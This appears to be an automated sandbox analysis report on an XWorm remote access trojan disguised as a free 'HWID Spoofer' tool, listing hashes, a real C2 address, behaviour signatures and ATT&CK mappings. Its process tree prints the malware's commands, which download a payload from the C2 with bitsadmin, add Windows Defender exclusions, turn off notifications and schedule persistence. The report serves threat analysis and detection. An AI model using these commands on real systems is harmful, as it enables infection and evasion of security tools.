Overview

overview

10

Static

static

3

HWID Spoof...24.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    596s
  • max time network
    599s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/06/2024, 09:06

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    HWID Spoofer Free 2024.exe

  • Size

    260KB

  • MD5

    9c01f25760bb62f4b63185a483332626

  • SHA1

    d0a71eba30f35492a7977c509d9361bde7a09409

  • SHA256

    d940565d0508025bf84d9a87d9ed6e223e60a473abcb972eb65d0b94c5428f9c

  • SHA512

    198464802cb8492fc191c47a0150c646af5b62d8d0a55e9895d64ccebcbffd2b96e9b268dfd76bdf951fe4112e7a4e0d516bb6c4d49904a479c3cf610f1c1303

  • SSDEEP

    6144:3TeTVJYOz8inVydSciujP7AbaniTuS7gaEpl0T81/1Whx:jeTVJYOBVyYciujP7AbanLkql481/1

Score
10/10
xwormdiscoveryexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

45.141.26.194:7000

Attributes
  • Install_directory

    %Temp%

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 20 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 3 IoCs
    dropper
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 20 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
    ransomware
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Free 2024.exe
    "C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Free 2024.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4992
    • C:\Users\Admin\AppData\Local\Temp\HWID Spoofer.exe
      "C:\Users\Admin\AppData\Local\Temp\HWID Spoofer.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4648
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Set-MpPreference -PUAProtection 1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:888
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' -Name DisableNotifications -Value 1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1280
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Add-MpPreference -ExclusionPath C:\
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4424
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nikrlj2d\nikrlj2d.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2920
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES22E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC90E4040E5A3443649A5EE4F3554150C8.TMP"
          4⤵
            PID:1476
        • C:\Users\Admin\AppData\Local\Temp\win64.exe
          "C:\Users\Admin\AppData\Local\Temp\win64.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          PID:2276
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4712
        • C:\Windows\SysWOW64\bitsadmin.exe
          "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://45.141.26.194/SecurityHealthSystray.exe C:\ProgramData\SecurityHealthSystray.exe
          3⤵
          • Download via BitsAdmin
          PID:2532
        • C:\ProgramData\SecurityHealthSystray.exe
          "C:\ProgramData\SecurityHealthSystray.exe"
          3⤵
          • Drops startup file
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:17928
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\SecurityHealthSystray.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:21524
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SecurityHealthSystray.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:21860
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Registry'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:22140
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Registry'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:22476
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Registry" /tr "C:\Users\Admin\AppData\Local\Temp\Registry"
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:23068
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3404,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=3804 /prefetch:8
      1⤵
        PID:2260
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /4
        1⤵
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:25980
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:33064
        • C:\Users\Admin\AppData\Local\Temp\Registry
          C:\Users\Admin\AppData\Local\Temp\Registry
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:51496
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe"
          1⤵
          • Enumerates system info in registry
          • Modifies data under HKEY_USERS
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:72156
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffe091ab58,0x7fffe091ab68,0x7fffe091ab78
            2⤵
              PID:72268
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:2
              2⤵
                PID:72876
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:8
                2⤵
                  PID:72896
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2240 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:8
                  2⤵
                    PID:72964
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3004 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:1
                    2⤵
                      PID:73012
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3012 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:1
                      2⤵
                        PID:73052
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3632 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:1
                        2⤵
                          PID:73440
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4432 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:8
                          2⤵
                            PID:73500
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:8
                            2⤵
                              PID:73536
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4816 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:8
                              2⤵
                                PID:75600
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4504 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:8
                                2⤵
                                  PID:75612
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:8
                                  2⤵
                                    PID:75844
                                  • C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
                                    "C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
                                    2⤵
                                      PID:78428
                                      • C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
                                        "C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff62492ae48,0x7ff62492ae58,0x7ff62492ae68
                                        3⤵
                                          PID:78556
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4920 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:1
                                        2⤵
                                          PID:81840
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4528 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:1
                                          2⤵
                                            PID:85728
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:8
                                            2⤵
                                              PID:89016
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4864 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:8
                                              2⤵
                                                PID:89036
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5288 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:8
                                                2⤵
                                                  PID:89044
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3156 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:8
                                                  2⤵
                                                    PID:89664
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4248 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:8
                                                    2⤵
                                                      PID:89792
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5272 --field-trial-handle=1884,i,17982517791615900399,2284742469449249982,131072 /prefetch:8
                                                      2⤵
                                                        PID:89800
                                                      • C:\Users\Admin\Downloads\Everything-1.4.1.1024.x64-Setup.exe
                                                        "C:\Users\Admin\Downloads\Everything-1.4.1.1024.x64-Setup.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:90276
                                                        • C:\Users\Admin\AppData\Local\Temp\nsz6625.tmp\Everything\Everything.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\nsz6625.tmp\Everything\Everything.exe" -install "C:\Program Files\Everything" -install-options " -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0"
                                                          3⤵
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          • Drops file in Program Files directory
                                                          PID:96188
                                                          • C:\Program Files\Everything\Everything.exe
                                                            "C:\Program Files\Everything\Everything.exe" -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            • Drops file in Program Files directory
                                                            • Modifies registry class
                                                            PID:94888
                                                        • C:\Program Files\Everything\Everything.exe
                                                          "C:\Program Files\Everything\Everything.exe" -disable-update-notification -uninstall-quick-launch-shortcut -no-choose-volumes -language 1033
                                                          3⤵
                                                          • Executes dropped EXE
                                                          PID:95324
                                                        • C:\Program Files\Everything\Everything.exe
                                                          "C:\Program Files\Everything\Everything.exe"
                                                          3⤵
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          • Enumerates connected drives
                                                          • Drops file in Windows directory
                                                          • Modifies registry class
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:72968
                                                          • C:\Windows\system32\NOTEPAD.EXE
                                                            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\HWID Spoofer Free 2024.exe.log
                                                            4⤵
                                                            • Opens file in notepad (likely ransom note)
                                                            PID:117380
                                                          • C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Free 2024.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Free 2024.exe"
                                                            4⤵
                                                            • Checks computer location settings
                                                            • Modifies registry class
                                                            PID:149488
                                                            • C:\Users\Admin\AppData\Local\Temp\HWID Spoofer.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\HWID Spoofer.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:149604
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "powershell" Set-MpPreference -PUAProtection 1
                                                                6⤵
                                                                  PID:149768
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  "powershell" Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' -Name DisableNotifications -Value 1
                                                                  6⤵
                                                                    PID:149780
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    "powershell" Add-MpPreference -ExclusionPath C:\
                                                                    6⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    PID:149796
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                  5⤵
                                                                  • Checks computer location settings
                                                                  PID:149632
                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                    "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://45.141.26.194/SecurityHealthSystray.exe C:\ProgramData\SecurityHealthSystray.exe
                                                                    6⤵
                                                                    • Download via BitsAdmin
                                                                    PID:149736
                                                                  • C:\ProgramData\SecurityHealthSystray.exe
                                                                    "C:\ProgramData\SecurityHealthSystray.exe"
                                                                    6⤵
                                                                      PID:149972
                                                                • C:\Windows\system32\NOTEPAD.EXE
                                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\HWID Spoofer Free 2024.exe.log
                                                                  4⤵
                                                                  • Opens file in notepad (likely ransom note)
                                                                  PID:149888
                                                                • C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Free 2024.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Free 2024.exe"
                                                                  4⤵
                                                                  • Checks computer location settings
                                                                  • Modifies registry class
                                                                  PID:173692
                                                                  • C:\Users\Admin\AppData\Local\Temp\HWID Spoofer.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\HWID Spoofer.exe"
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:173836
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      "powershell" Set-MpPreference -PUAProtection 1
                                                                      6⤵
                                                                        PID:173976
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        "powershell" Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' -Name DisableNotifications -Value 1
                                                                        6⤵
                                                                          PID:173984
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell" Add-MpPreference -ExclusionPath C:\
                                                                          6⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          PID:173996
                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                        5⤵
                                                                        • Checks computer location settings
                                                                        PID:173884
                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                          "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://45.141.26.194/SecurityHealthSystray.exe C:\ProgramData\SecurityHealthSystray.exe
                                                                          6⤵
                                                                          • Download via BitsAdmin
                                                                          PID:174004
                                                                        • C:\ProgramData\SecurityHealthSystray.exe
                                                                          "C:\ProgramData\SecurityHealthSystray.exe"
                                                                          6⤵
                                                                            PID:174368
                                                                • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                                                  "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                                                  1⤵
                                                                    PID:73260
                                                                  • C:\Program Files\Everything\Everything.exe
                                                                    "C:\Program Files\Everything\Everything.exe" -svc
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:95284
                                                                  • C:\Users\Admin\AppData\Local\Temp\Registry
                                                                    C:\Users\Admin\AppData\Local\Temp\Registry
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:107852
                                                                  • C:\Users\Admin\AppData\Local\Temp\Registry
                                                                    C:\Users\Admin\AppData\Local\Temp\Registry
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:169092
                                                                  • C:\Users\Admin\AppData\Local\Temp\Registry
                                                                    C:\Users\Admin\AppData\Local\Temp\Registry
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:231812
                                                                  • C:\Users\Admin\AppData\Local\Temp\Registry
                                                                    C:\Users\Admin\AppData\Local\Temp\Registry
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:300976
                                                                  • C:\Users\Admin\AppData\Local\Temp\Registry
                                                                    C:\Users\Admin\AppData\Local\Temp\Registry
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:370180
                                                                  • C:\Users\Admin\AppData\Local\Temp\Registry
                                                                    C:\Users\Admin\AppData\Local\Temp\Registry
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:439620
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4756,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=4656 /prefetch:8
                                                                    1⤵
                                                                      PID:455632
                                                                    • C:\Users\Admin\AppData\Local\Temp\Registry
                                                                      C:\Users\Admin\AppData\Local\Temp\Registry
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:508904
                                                                    • C:\Users\Admin\AppData\Local\Temp\Registry
                                                                      C:\Users\Admin\AppData\Local\Temp\Registry
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:578292
                                                                    • C:\Users\Admin\AppData\Local\Temp\Registry
                                                                      C:\Users\Admin\AppData\Local\Temp\Registry
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:647504

                                                                    Network

                                                                          MITRE ATT&CK Enterprise v15

                                                                          Reconnaissance

                                                                          Resource Development

                                                                          Initial Access

                                                                          Execution

                                                                          Command and Scripting Interpreter

                                                                          1
                                                                          T1059

                                                                          PowerShell

                                                                          1
                                                                          T1059.001

                                                                          Scheduled Task/Job

                                                                          1
                                                                          T1053

                                                                          Scheduled Task

                                                                          1
                                                                          T1053.005

                                                                          Persistence

                                                                          BITS Jobs

                                                                          1
                                                                          T1197

                                                                          Boot or Logon Autostart Execution

                                                                          1
                                                                          T1547

                                                                          Registry Run Keys / Startup Folder

                                                                          1
                                                                          T1547.001

                                                                          Scheduled Task/Job

                                                                          1
                                                                          T1053

                                                                          Scheduled Task

                                                                          1
                                                                          T1053.005

                                                                          Privilege Escalation

                                                                          Boot or Logon Autostart Execution

                                                                          1
                                                                          T1547

                                                                          Registry Run Keys / Startup Folder

                                                                          1
                                                                          T1547.001

                                                                          Scheduled Task/Job

                                                                          1
                                                                          T1053

                                                                          Scheduled Task

                                                                          1
                                                                          T1053.005

                                                                          Defense Evasion

                                                                          BITS Jobs

                                                                          1
                                                                          T1197

                                                                          Modify Registry

                                                                          1
                                                                          T1112

                                                                          Credential Access

                                                                          Unsecured Credentials

                                                                          1
                                                                          T1552

                                                                          Credentials In Files

                                                                          1
                                                                          T1552.001

                                                                          Discovery

                                                                          Peripheral Device Discovery

                                                                          2
                                                                          T1120

                                                                          Query Registry

                                                                          6
                                                                          T1012

                                                                          System Information Discovery

                                                                          5
                                                                          T1082

                                                                          Lateral Movement

                                                                          Collection

                                                                          Data from Local System

                                                                          1
                                                                          T1005

                                                                          Command and Control

                                                                          Exfiltration

                                                                          Impact

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\Program Files\Everything\Everything.ini
                                                                            Filesize

                                                                            215B

                                                                            MD5
